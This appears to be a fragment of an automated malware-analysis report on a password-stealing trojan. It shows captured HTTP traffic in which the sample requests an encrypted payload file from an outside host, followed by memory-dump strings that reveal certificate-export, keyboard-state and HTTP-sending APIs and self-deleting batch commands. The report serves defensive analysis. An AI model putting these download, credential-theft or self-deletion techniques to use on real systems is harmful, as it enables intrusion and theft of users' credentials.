.photo-link{float:left}.dailyBuzz .videobutton,.dailyBuzz .videobutton-bg{margin-top:-5px}#dl_v2 .dllabel,#dl_v2 #advertad1 .dllabel,#dl_v2.dl #mkplace1 .dllabel{top:0}.slideshow h3 a{font-size:15px}@media only screen and (max-width:767px){#dl_v2 .dllabel,#dl_v2 #advertad1 .dllabel,#dl_v2.dl #mkplace1 .dllabel{display:none}}#gravitymodarticle{clear:both}</style><style type="text/css" id="cobrandadhoccss-with-inheritance"></style><script type="text/javascript" src="hXXp://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm._Y1eHza8xn.js"></script>.<
<<
<<< skipped >>>
GET /images/css/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: highclassdelhiescorts.in
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Date: Sat, 24 May 2014 05:56:40 GMT
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /images/css/al0302.enc was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...
Map
The Trojan-PSW connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_1684_rwx_021E0000_00048000:
.text
.text
`.data
`.data
.idata
.idata
@.reloc
@.reloc
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
>$>,>4><>
>$>,>4><>
0123456789
0123456789
http://www.google.com/
http://www.google.com/
http://www.bing.com/
http://www.bing.com/
REPORT
REPORT
HTTP/1.1
HTTP/1.1
RegDeleteKeyExW
RegDeleteKeyExW
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
.TJFZAIY]JD^"
.TJFZAIY]JD^"
?:527|:!;8
?:527|:!;8
!1 (##!(
!1 (##!(
Kmv`jn`%fnfnzg,bt3crd~da4
Kmv`jn`%fnfnzg,bt3crd~da4
1&,$=OJ-:&#O-
1&,$=OJ-:&#O-
-.ynp<</pre><pre>'2$4>%|903</pre><pre>: 8? 1 !</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>w%fkN</pre><pre>t.Ht$HHt</pre><pre>L$Â$</pre><pre>m9.td</pre><pre>zcÁ</pre><pre>ntdll.dll</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>USER32.dll</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>RegCreateKeyExW</pre><pre>RegCloseKey</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegFlushKey</pre><pre>RegEnumKeyExW</pre><pre>ADVAPI32.dll</pre><pre>UrlUnescapeA</pre><pre>PathIsURLW</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>GDI32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>msvcrt.dll</pre><pre>9 9$9(9,9094989</pre><pre>> >$>(>,>0>4>|></pre><pre>00D0K0_0q0z0</pre><pre>:!:(:,:1:8:^:</pre><pre>\StringFileInfo\xx\%s</pre><pre>urlmon.dll</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>kernel32.dll</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>shell32.dll</pre><pre>cabinet.dll</pre><pre>Wadvapi32.dll</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>%Documents and Settings%\%current user%\Application Data</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}</pre>